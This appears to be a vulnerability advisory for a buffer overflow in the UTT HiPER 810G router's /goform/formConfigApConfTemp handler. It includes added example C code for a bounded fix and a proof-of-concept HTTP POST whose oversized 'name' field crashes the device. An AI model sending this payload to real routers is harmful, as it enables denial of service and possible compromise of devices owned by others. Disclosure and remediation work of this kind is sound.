Information
Vendor of the products: UTT
Vendor's website: UTT艾泰 (professional router, switch and firewall brand)
Affected products: HiPER 810G
Affected firmware version: <=v3v1.7.7-171114
Firmware download address: UTT艾泰 (professional router, switch and firewall brand)
Overview
A serious buffer overflow vulnerability was found in the UTT Aggressive HiPER 810G router. An attacker can trigger it through the route /goform/formConfigApConfTemp, causing buffer overflow attacks, denial of service attacks, etc. The overflow is realized through the call "strcpy((char *)(InstPointByName_1 + 36), src);".
Vulnerability details
The API for invoking the function
Here src and v81 are read from the request. The code then checks whether the value of v81 is add; if it is not, execution enters the branch shown here.
Here src is copied directly with strcpy, which performs no length check, causing the buffer overflow.
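A bounded replacement for the copy described above, added here as an example (not the vendor's code and not part of the original report). The 36-byte offset comes from the page; the struct, the 32-byte field size and the function names are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Assumed layout: the page only shows that the destination starts 36 bytes
 * into the instance; NAME_MAX_LEN and the struct itself are hypothetical. */
#define NAME_OFFSET  36
#define NAME_MAX_LEN 32

struct ap_conf_temp {                 /* hypothetical stand-in for the instance */
    unsigned char head[NAME_OFFSET];  /* fields preceding the name */
    char name[NAME_MAX_LEN];          /* destination of the copy */
    unsigned int guard;               /* neighbouring field an overflow would hit */
};

/* Bounded replacement for strcpy((char *)(inst + 36), src).
 * Returns 0 on success, -1 if src is missing or does not fit with its NUL. */
int set_name_checked(struct ap_conf_temp *inst, const char *src)
{
    const char *nul;

    if (inst == NULL || src == NULL)
        return -1;
    nul = memchr(src, '\0', NAME_MAX_LEN);   /* scans at most the field size */
    if (nul == NULL)
        return -1;                           /* reject instead of truncating */
    memcpy(inst->name, src, (size_t)(nul - src) + 1);  /* +1 copies the NUL */
    return 0;
}

/* Constructed inputs: a short name is stored, an oversized one is refused
 * and the adjacent field stays untouched. Returns 1 when all of that holds. */
int demo(void)
{
    struct ap_conf_temp inst;
    char longname[256];

    memset(&inst, 0, sizeof inst);
    inst.guard = 0xC0FFEEu;
    memset(longname, 'a', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    if (set_name_checked(&inst, "template1") != 0) return 0;
    if (set_name_checked(&inst, longname) != -1) return 0;
    return inst.guard == 0xC0FFEEu && strcmp(inst.name, "template1") == 0;
}
```

Rejecting the request rather than truncating keeps a delete or modify action from silently operating on a different template name than the one submitted.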
POC
POST /goform/formConfigApConfTemp HTTP/1.1
Host: 192.168.1.1
Content-Length: 1822
Cache-Control: max-age=0
Authorization: Digest username="admin", realm="UTT", nonce="80758026511134abc9038ea9363e038c", uri="/goform/formArpBindGlobalConfig", algorithm=MD5, response="3c90b3b4d198905f88cf1301ff8ad6b5", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000001a1, cnonce="71e33390dc75c484"
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.1/IPMac.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788
Connection: close
action=del&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
